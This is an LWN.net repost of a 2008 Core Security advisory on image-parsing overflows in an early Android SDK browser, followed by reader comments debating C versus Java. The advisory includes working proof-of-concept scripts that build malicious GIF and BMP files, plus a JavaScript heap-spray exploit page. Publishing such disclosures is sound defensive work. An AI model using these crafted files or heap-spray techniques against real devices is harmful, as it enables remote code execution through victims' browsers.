Weekly Edition
Return to the Security page
| ||||||||||||||||
|
| ||||||||||||||||
A set of Android vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
*Vulnerability Information*
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
not made an official release yet, several vendors of mobile chips have
unveiled prototype phones built using development releases of the
platform at the Mobile World Congress [2]. Development using the Android
platform gained activity early in 2008 as a result of Google's launch of
the Android Development Challenge which includes $10 million USD in
awards [3] for which a Software Development Kit (SDK) was made available
in November 2007.
The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF an BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries other
were introduced by native Android code that use them or that implements
new functionality.
Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates phone running the Android
platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit.
*Vulnerable Packages*
. Android SDK m3-rc37a and earlier are vulnerable several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory).
. Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3).
*Non-vulnerable Packages*
. Android SDK m5-rc15
*Vendor Information, Solutions and Workarounds*
Vendor statement:
"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."
*Credits*
These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.
*Technical Description / Proof of Concept Code*
Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.
The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.
Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of
executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-start exploitation techniques for different hardware
platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
filed of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the
open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
/* Put the screen descriptor into the file: */
if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
return GIF_ERROR;
...
}
- -----------/
We can see that the fields are stored in the first 2 words of the
structure:
/-----------
typedef struct GifFileType {
/* Screen dimensions. */
GifWord SWidth, SHeight,
...
}
- -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL _DGifOpen
.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5
- -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the Logical
Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile)
{ ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
sp->RasterBits = (unsigned char *)malloc(ImageSize *
sizeof(GifPixelType));
...
}
- -----------/
Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !
- -----------/
However the actual image may be much larger that these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294 MOV R0, R8
.text:0002F298 MOV R1, #3
.text:0002F29C MOV R2, R9
.text:0002F2A0 MOV R3, R11
.text:0002F2A4 STR R12, [SP,#0x48+var_3C]
.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;
ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int
,int)
Bitmap::setConfig():
.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap
.text:0002F2BC MOV R1, #3
.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !
.text:0002F2C4 MOV R3, R11
.text:0002F2C8 STR R10, [SP,#0x48+var_48]
.text:0002F2CC BL _Bitmap9setConfig ;
Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
- -----------/
This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap
- -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ;
SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes
- -----------/
The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library. Once generated the GIF
file, it must be opened in the Android browser to trigger the overflow:
/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
- -----------/
This security bug affects Android SDK m3-rc37a and earlier versions.
Version m5-rc14 of the Android SDK includes a fix and is not vulnerable
to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that
employs lossless data compression [9]. PNG was created to improve upon
and replace the GIF format as an image file format that does not require
a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used
code to load graphic files, as libpng, giflib and others. The version
inside libsgl.so distributed with Android SDK m3-rc37a and earlier
versions include the string '"libpng version 1.2.8 - December 3, 2004"'.
Source code inspection of the file
'\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included
in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android
project reveals that '"libpng version 1.2.7 - September
12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier
versions vulnerable to the following known issues: ' CVE-2006-5793,
CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,
CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is
likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for
device-independent bitmap), is an image file format used to store bitmap
digital images, especially on Microsoft Windows and OS/2 operating
systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header
is parsed in the method 'BMP::readFromStream(Stream *,
ImageDecoder::Mode)' inside the 'libsgl.so' library. When the
value of the 'offset' field of the BMP file header is negative and the
Bitmap Information section (DIB header) specifies an image of 8 bits per
pixel (8 bpp) the parser will try to allocate a palette, and will use
the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white
('0x00ffffff') but with a carefully chosen negative offset it can be
made to overwrite any address of the process with that value. Because
the BMP decoder source wasn't released, a disassembly of the binary
included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset
.text:0002EE3C MOV R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40 LDR R3, [R10,#0x10]
.text:0002EE44 ADD LR, LR, #1
.text:0002EE48 MOVL R2, 0xFFFFFFFF
.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the
same bug) but ranges 0x10000-0x20000
.text:0002EE50 MOV R0, #0
.text:0002EE54 CMP LR, R9
.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)
.text:0002EE5C STRB R2, [R1,#2]
.text:0002EE60 STRB R0, [R1,#3]
.text:0002EE64 STRB R2, [R1,#1]
.text:0002EE68 ADD R12, R12, #4
.text:0002EE6C BNE loc_2EE40
- -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
# ps
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]
08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)
...
#
- -----------/
We can see that the heap is located in the range '0000a000-00c73000'
and it is executable. Overwriting this area will allow to redirect
execution flow if there is a virtual table stored in the heap. Later on
the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object
.text:0002EB68 MOV R0, R8
.text:0002EB6C MOV LR, PC
.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10
- -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill
the heap with the white color '
0x00ffffff' we can load the Program Counter with the value at
'0xffffff+0x10'. The following python script will generate a BMP to
accomplish that:
/-----------
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct
offset = 0xffef0000
width = 0x0bffff
height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
- -----------/
Opening the BMP file generated with this script inside a HTML page will
cause (sometimes, as it is dependent on an uninitialized variable) the
following output of the gdb debugger:
/-----------
(gdb) attach 1574
attach 1574
Attaching to program: /system/bin/app_process, process 1574
...
0xafe0d204 in __futex_wait () from /system/lib/libc.so
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb)
- -----------/
Here the browser process has jumped to the '0x00000000' address because
that is the value at 0x00ffffff+0x10. We can change this value using
common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
<HTML>
<HEAD>
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
var nop = unescape("%u4000%u4000");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<2;i++)
document.write(nop)
</script>
<IMG src=badbmp.bmp>
</BODY>
</HTML>
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach
the address '0xffffff' it is very slow and the default memory
configuration of Android will often abort the process before reaching
the desired point. To overcome this limitation for demonstration
purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory,
plenty for the exploit to work.
This security bug affects Android SDK m5-rc14 and earlier versions.
*Report Timeline*
. 2008-01-30: Vendor is notified that possibly exploitable
vulnerabilities where discovered and that an advisory draft is
available. This affects Android SDK m3-rc37a and earlier versions.
. 2008-01-30: Vendor acknowledges and requests the draft.
. 2008-01-31: Core sends the draft encrypted, including PoC code to
generate malformed GIF images.
. 2008-01-31: Vendor acknowledges the draft.
. 2008-02-02: Vendor notifies that the software is an early release for
the open source community, but agree they can fix the problem on the
estimated date (2008-02-25).
. 2008-02-04: Core notifies the vendor that Android is using a
vulnerable PNG processing library.
. 2008-02-08: Vendor acknowledges, invites Core to send any new
findings and asks if all findings will be included in the advisory.
. 2008-02-12: Core responds to vendor that all security issues found
will be included in the advisory, the date is subject to coordination.
. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core
receives no notification.
. 2008-02-13: Core sends the vendor more malformed images, including
GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release.
. 2008-02-20: Core sends to the vendor a new version of the advisory,
including a BMP PoC that runs arbitrary ARM code and informs the vendor
that we noticed that the recent m5-rc14 release fixed the GIF and PNG
bugs. Publication of CORE-2008-0124 has been re-=scheduled for February
27th. 2008.
. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been
released and provides an official statement to the "Vendor Section" of
the advisory. A final review of the advisory is requested before its
release. The vendor indicates that the Android SDK is still in
development and stabilization won't happen until it gets closer to
Alpha. Changes to fix the BMP issue are coming soon, priorities are
given to issues listed in the public issue tracking system at
http://code.google.com/p/android/issues .
. 2008-02-26: Core indicates that publication of CORE-2008-0124 has
been moved to March 3rd 2008, asks if an estimated date for the BMP fix
is available and if Core should file the reported and any future bugs
in the public issue tracking page.
. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to
the vendor as requested. Core requests for any additional comments or
statements to be provided by noon March 3rd, 2008 (UTC-5)
. 2008-03-01: Vendor requests publication to be delayed one day in
order to publish a new release of Android with a fix to the BMP issue.
. 2008-03-02: Core agrees to delay publication for one day.
. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP
vulnerability. Vendor indicates that Android applications run with
the credentials of an unprivileged user which decreases the severity of
the issues found
. 2008-03-04: Further research by Alfredo Ortega reveals that although
the vendor statement is correct current versions of Android SDK ship
with a passwordless root account. Unprivileged users with shell access
can simply use the 'su' program to gain privileges
. 2008-03-04: Advisory CORE-2008-0124 is published.
*References*
[1] Android Overview - Open Handset Alliance -
http://www.openhandsetalliance.com/android_overview.html
[2] "Android Comes to Life in Barcelona" - The Washington Post ,
February 11th, 2008 -
http://www.washingtonpost.com/wp-dyn/content/article/2008...
[3] Android Developer Challenge - http://code.google.com/android/adc.html
[4] "Test Center Preview: Inside Google's Mobile future" - Inforworld,
Feb. 27th 2008 -
http://www.infoworld.com/article/08/02/27/09TC-google-and...
[5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th,
2008
http://www.smh.com.au/news/biztech/allo-allo-android/2008...
[6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes
by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte.
Wiley; 2nd edition (August 20, 2007) -
http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008...
[7] Graphics Interchange Format version 89a -
http://www.w3.org/Graphics/GIF/spec-gif89a.txt
[8] Android downloads page http://code.google.com/p/android/downloads/list
[9] Portable Network Graphics (PNG) specification -
http://www.w3.org/TR/PNG/
[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_securi....
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I
teV3ahcSAUFEtsaRCeXVuN8=
=u35s
-----END PGP SIGNATURE-----
(Log in to post comments)
A set of Android vulnerabilities Posted Mar 5, 2008 21:36 UTC (Wed) by davidw (subscriber, #947) [Link] Seems like a lot of fuss for something that's still alpha-betaish. Doubtless things will also continue to improve when the source code is actually released.
A set of Android vulnerabilities Posted Mar 5, 2008 21:46 UTC (Wed) by jwb (guest, #15467) [Link] The vulnerabilities point to the fundamental flaw of the Android kit: it's written in C and other unsafe languages. If something is going to run on my phone it had better be implemented in a safe, protected environment like Java. Otherwise I don't plan to go near it. Coding in C is always unsafe and should be avoided where possible. The idea of writing a brand new operating system for telephones in C in 2008 is absurd and should be an embarrassment to the people who came up with this plan. You should expect to see a steady stream of these types of alerts for the next decade or so.
A set of Android vulnerabilities Posted Mar 5, 2008 21:50 UTC (Wed) by davidw (subscriber, #947) [Link] Android *is* written in Java, except for the kernel, which is indeed written in C - they use Linux - and some other low-level bits and pieces.
A set of Android vulnerabilities Posted Mar 5, 2008 22:00 UTC (Wed) by jwb (guest, #15467) [Link] Uh no. They are using webkit and libpng and libgif and sqllite and freetype and many other high level system functions written in C or C++.
A set of Android vulnerabilities Posted Mar 5, 2008 22:06 UTC (Wed) by davidw (subscriber, #947) [Link] Obviously - that's what this article is about, isn't it... Most of it's in Java, but not all of it. In any case, let's see how that stacks up with other things out there right now: * Java ME: Java, but a fairly limited version of it. * Symbian: C++. * Whatever Microsoft offers: C++ and maybe some .Net. So... all things considered, not so bad. I'm guessing that even JavaME calls out to some bits and pieces in C, because we're talking about resource constrained systems here where performance is important.
A set of Android vulnerabilities Posted Mar 6, 2008 9:58 UTC (Thu) by nim-nim (subscriber, #34454) [Link] Since openjdk dropped its old quirky proprietary font renderer for freetype, I find this remark highly amusing. JVMs are built on top of system libs too. In fact decent performance and system integration requires they use those libs instead of an half-backed Java reimplementation. Just because SUN used to ship an opaque blob with internal static linking does not mean this blob was ever written 100% in Java.
A set of Android vulnerabilities Posted Mar 6, 2008 20:08 UTC (Thu) by drag (subscriber, #31333) [Link] Well Java itself is written in C++, is it not?
A set of Android vulnerabilities Posted Mar 5, 2008 23:42 UTC (Wed) by AJWM (guest, #15888) [Link] > If something is going to run on my phone it had better be implemented in a safe, protected environment like Java. Otherwise I don't plan to go near it. So, what do expect the JVM to be written in, or are you asking for a Java chip?
A set of Android vulnerabilities Posted Mar 6, 2008 0:40 UTC (Thu) by jwb (guest, #15467) [Link] Many common phone processors, for example the TI OMAP series, do in fact have hardware Java executors. Obviously some part of the platform has to be coded to the metal, and other parts above that will probably be coded in C, but these can be kept to a minimum. Android imports WebKit which is an enormous, barely-functional hack which is known to be riddled with exploitable defects. How to we know they are exploitable? Because the most popular means of installing software on your iPhone is to smash the stack or overflow a buffer in WebKit. For Google to adopt the same system reeks of a lack of imagination and initiative and a stagnation in the practice of software development in the industry at large.
A set of Android vulnerabilities Posted Mar 6, 2008 7:07 UTC (Thu) by jamesh (subscriber, #1159) [Link] Do you know of any device of similar power to a phone shipping with a web browser implemented in a language like Java?
A set of Android vulnerabilities Posted Mar 6, 2008 7:17 UTC (Thu) by jwb (guest, #15467) [Link] Blackberry.
A set of Android vulnerabilities Posted Mar 6, 2008 9:27 UTC (Thu) by jamesh (subscriber, #1159) [Link] How does it compare to the functionality of Opera, Webkit, IE and Mozilla on mobile platforms? What percentage of the web does it render correctly?
A set of Android vulnerabilities Posted Mar 6, 2008 15:11 UTC (Thu) by tialaramex (subscriber, #21167) [Link] The BlackBerry is of course running a proprietary black box system. So any value of the claims about its design is predicated on you working for RIM and speaking in an official capacity on their behalf. If you're not actually a RIM engineer then really you might as well say whatever you like, maybe the whole thing is implemented in a i386 JIT emulation running Prolog. The BlackBerry browser can render PNGs. It might be doing this using a custom written Java implementation of the PNG standard, or more likely, as with Android by simply integrating some portable C code into the system itself. Do you have irrefutable evidence one way or the other? As to the claims about WebKit, notice that "the device's owner can force it to do something not intended by the manufacturer" is a completely different type of security claim than "the creator of a web site visited by the device can force the device to do something not intended by the device owner". Preventing the latter is much easier.
A set of Android vulnerabilities Posted Mar 6, 2008 10:40 UTC (Thu) by njs (subscriber, #40338) [Link] > WebKit [...] is an enormous, barely-functional hack ...that happens to be one of the only four top-tier html renderers that exist (the others being Mozilla, IE, and Opera). Building one of these things is man-decades of effort. If Google has insufficient imagination and initiative to reinvent that wheel and instead chooses to use the discredited practice of "fixing the bugs", then I suppose they will just have to suffer the consequences.
A set of Android vulnerabilities Posted Mar 5, 2008 22:39 UTC (Wed) by sbdep (subscriber, #13282) [Link] While the security vulnerabilities show a certain amount of laxness in the Android release, I suspect the amount of fuss has more to do with getting the Core Security Technologoes name out. By making a fuss about the cool new Google platform, they will likely get more attention than they would have if it was a "normal" security advisory for a much lower key software package.
A set of Android vulnerabilities Posted Mar 6, 2008 7:41 UTC (Thu) by jfj (guest, #37917) [Link] Well, this specific case deserves the hype. Buffer overflows in image decoders are serious because a web browser downloads/decodes images from the network (and often totally untrusted sites) all the time. Buffer overflows in the *web browser* are doubly more serious because it means that your computer is an open backdoor -- vunerable to external data. This is not a "pcre vunerable when executing untrusted regular expressions" or something. Buffer overflows in *both* GIF, PNG *and* BMP? This smells bad. Thanks to Code Security for bringing google's attention to this.
A set of Android vulnerabilities Posted Mar 6, 2008 11:34 UTC (Thu) by tialaramex (subscriber, #21167) [Link] Web browsers implement Javascript. That means they need a regular expression engine. Can you see where this is going? Most of your system libraries are accessible in some fashion through the web browser. Whether it's font handling, image loading, XML processing, network connections, video playback, it's all getting bolted into the browser and presented for any third party to access when you follow a link. Since we've rejected all safe courses at this point we must accept that we are in dangerous waters. It's not so different from private transport where safety (this time in terms of actual civilian deaths) is sacrificed at the altar of personal convenience (everyone "needs" to drive a car, so we can't insist on more than rudimentary standards for drivers). The tiresome insistence that all these problems would go away if only we'd write everything in LISP or today's flavor of the month language serves no purpose. If it were true, it would say nothing for the practicality of the endeavor - and (which is worse) we already know it isn't true.
choice of language Posted Mar 8, 2008 12:19 UTC (Sat) by pjm (subscriber, #2080) [Link] It's true that no language can eliminate all bugs. However, I don't know of any way of completely eliminating vulnerabilities (short of not running any software); certainly SELinux/AppArmor/PaX don't prevent all vulnerabilities. So the best we can do is to use techniques to reduce vulnerabilities, and I believe that moving to languages safer than C/C++ is such a technique. There are many factors influencing one's choice of programming language for a task, and I usually use C/C++ myself, but I don't think we should discourage people from considering other languages.
|
|
|||||||||||||||